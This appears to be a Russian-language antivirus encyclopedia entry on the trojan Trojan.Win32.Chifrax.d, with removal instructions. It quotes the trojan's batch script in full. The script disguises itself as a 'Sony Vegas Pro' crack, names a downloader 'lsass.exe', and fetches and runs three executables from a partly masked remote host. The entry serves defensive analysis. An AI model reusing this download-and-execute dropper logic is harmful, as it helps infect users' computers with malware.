Trojan.Win32.Chifrax.d

Технические детали
Деструктивная активность
Рекомендации по удалению

Технические детали

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 171008 байт. Написана на C++.

Деструктивная активность

После запуска троянец выполняет следующие действия:

• извлекает из своего тела файлы, которые сохраняются в каталоге хранения временных файлов текущего пользователя как

  %Temp%\IXP000.TMP\lsass.exe (118784 байта)
  %Temp%\IXP000.TMP\w.bat (49 байт)
  

  Сценарий содержит следующие строки:

  @echo off
  %SystemRoot%\System32\cmd.exe /C r.bat
  %Temp%\IXP000.TMP\r.bat (567 байт)
  

  Сценарий содержит следующие строки:

  @echo off
  ren lsass lsass.exe
  start "" "sony.vegas.pro.80b.build.217-nope.exe"
  net start bits
  IF NOT EXIST C:\nul mkdir C:\
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/ic3.exe "C:\ecic3.exe"
  IF NOT EXIST C:\nul mkdir C:\
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/IC.exe "C:\exic.exe"
  IF NOT EXIST C:\nul mkdir C:\
  lsass.exe /transfer jman /download /priority high 
  http://bulg***ave.com/db.exe "C:\exdb.exe"
  start "" "C:\ecic3.exe"
  start "" "C:\exic.exe"
  start "" "C:\exdb.exe"
  %Temp%\IXP000.TMP\sony.vegas.pro.80b.build.217-nope.exe (69521 байт)
  

• Создает ключ системного реестра:

  [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]
  "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,
  DelNodeRunDLL32 "%Temp%\IXP000.TMP\""
  

  Таким образом, при следующем старте системы каталог "%Temp%\IXP000.TMP" будет удален.
• Запускает на выполнение ранее созданный сценарий "w.bat", в свою очередь запускающий "r.bat".

После этого троянец завершает свою работу.

Запуск сценария "r.bat" приводит к выполнению следующих действий:

• запускается на выполнение файл "sony.vegas.pro.80b.build.217-nope.exe".
• При помощи созданного троянцем файла "lsass.exe" из сети Интернет загружаются файлы по следующим ссылкам:

  http://bulg***ave.com/ic3.exe
  http://bulg***ave.com/IC.exe
  http://bulg***ave.com/db.exe
  

  Загруженные файлы сохраняются в корневом каталоге диска C: соответственно под следующими именами:

  C:\ecic3.exe
  C:\exic.exe
  C:\exdb.exe
  

  На момент создания описания по всем приведенным ссылкам загружалась html-страница следующего содержания:

  

• Загруженные файлы запускаются на выполнение.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. При помощи Диспетчера задач завершить процессы:

   lsass.exe
   sony.vegas.pro.80b.build.217-nope.exe 
   

2. Удалить ключ системного реестра (как работать с реестром?):

   [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]
   "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,
   DelNodeRunDLL32 "%Temp%\IXP000.TMP\""
   

3. Удалить файлы:

   %Temp%\IXP000.TMP\lsass.exe 
   %Temp%\IXP000.TMP\w.bat 
   %Temp%\IXP000.TMP\r.bat 
   %Temp%\IXP000.TMP\sony.vegas.pro.80b.build.217-nope.exe 
   C:\ecic3.exe
   C:\exic.exe
   C:\exdb.exe
   

4. Удалить каталог:

   %Temp%\IXP000.TMP

5. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
6. Очистить каталог Temporary Internet Files, который может содержать инфицированные файлы (Как удалить инфицированные файлы в папке Temporary Internet Files?).
7. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).